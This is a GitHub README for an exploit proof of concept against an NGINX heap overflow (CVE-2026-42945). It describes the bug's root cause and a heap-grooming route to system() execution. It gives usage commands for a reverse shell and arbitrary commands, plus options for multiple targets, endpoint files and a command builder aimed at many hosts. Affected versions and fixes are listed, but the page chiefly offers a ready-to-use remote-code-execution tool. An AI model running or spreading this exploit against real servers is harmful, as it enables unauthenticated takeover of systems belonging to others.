GitHub - MalekD5/Nginx-Rift: exploit for CVE-2026-42945 · GitHub
Skip to content
 
 

Latest commit

 

History

9 Commits

Folders and files

Repository files navigation

NGINX Rift

RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx_http_rewrite_module introduced in 2008. The bug enables unauthenticated remote code execution against servers using rewrite and set directives.

This vulnerability — along with three other memory corruption issues (CVE-2026-42946, CVE-2026-40701, CVE-2026-42934) — was autonomously discovered by depthfirst's security analysis system after a single click of onboarding the NGINX source.

Want to find issues like this in your own code? Try the same system at https://depthfirst.com/open-defense.

The Bug (TL;DR)

NGINX's script engine uses a two-pass process: first compute the required buffer size, then copy data in. The is_args flag is set on the main engine when a rewrite replacement contains ?, but the length-calculation pass runs on a freshly zeroed sub-engine. So:

  • Length pass sees is_args = 0 → returns raw capture length.
  • Copy pass sees is_args = 1 → calls ngx_escape_uri with NGX_ESCAPE_ARGS, expanding each escapable byte to 3 bytes.

The copy overflows the undersized heap buffer with attacker-controlled URI data. Exploitation uses cross-request heap feng shui to corrupt an adjacent ngx_pool_t's cleanup pointer (sprayed via POST bodies, since URI bytes can't contain null bytes), redirecting it to a fake ngx_pool_cleanup_s invoking system() on pool destruction.

Read more about this bug in our technical write-up.

Affected & Fixed Versions

Product Affected Fixed in
NGINX Open Source 0.6.27 – 1.30.0 1.31.0, 1.30.1
NGINX Plus R32 – R36 R36 P4, R35 P2, R32 P6

Full vendor advisory: https://my.f5.com/manage/s/article/K000160932

Usage

Tested on Ubuntu 24.04.3 LTS.

  1. ./setup.sh — build the container.
  2. docker compose -f env/docker-compose.yml up — start the vulnerable NGINX server.
  3. python3 poc.py --shell — run the PoC against the default target (127.0.0.1:19321).

Run a command instead of a reverse shell:

python3 poc.py --cmd id

Run against a specific host and port:

python3 poc.py --cmd id --host 127.0.0.1 --port 19321

Run against multiple targets by repeating --target:

python3 poc.py --cmd id \
  --target 127.0.0.1:19321 \
  --target 10.0.0.5:8080 \
  --target example.com:80

--target takes HOST:PORT and can be provided multiple times. If no --target is provided, poc.py falls back to --host and --port.

Run against multiple trigger endpoints by repeating --endpoint:

python3 poc.py --cmd id \
  --endpoint /api/{payload} \
  --endpoint /v1/rewrite/{payload} \
  --endpoint /legacy/api

--endpoint takes a request path. If it contains {payload}, the payload is substituted there. Otherwise, the payload is appended as a path segment. If no endpoint is provided, poc.py uses /api/{payload}.

You can also load trigger endpoints from a file with --endpoints-file. Use one endpoint per line; blank lines and # comments are ignored.

Example endpoints.txt:

/api/{payload}
/v1/rewrite/{payload}
/legacy/api

Run with the endpoint file:

python3 poc.py --cmd id --endpoints-file endpoints.txt

Build a Command from a Target File

make_poc_command.py reads a file containing one host port pair per line and prints the final poc.py command.

Example targets.txt:

127.0.0.1 19321
10.0.0.5 8080
example.com 80

Generate a command for --cmd mode:

python3 make_poc_command.py targets.txt --cmd id

Output:

python3 poc.py --cmd id --target 127.0.0.1:19321 --target 10.0.0.5:8080 --target example.com:80

Generate a command for reverse shell mode:

python3 make_poc_command.py targets.txt --shell --listen-ip 172.17.0.1 --listen-port 1337

About

exploit for CVE-2026-42945

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages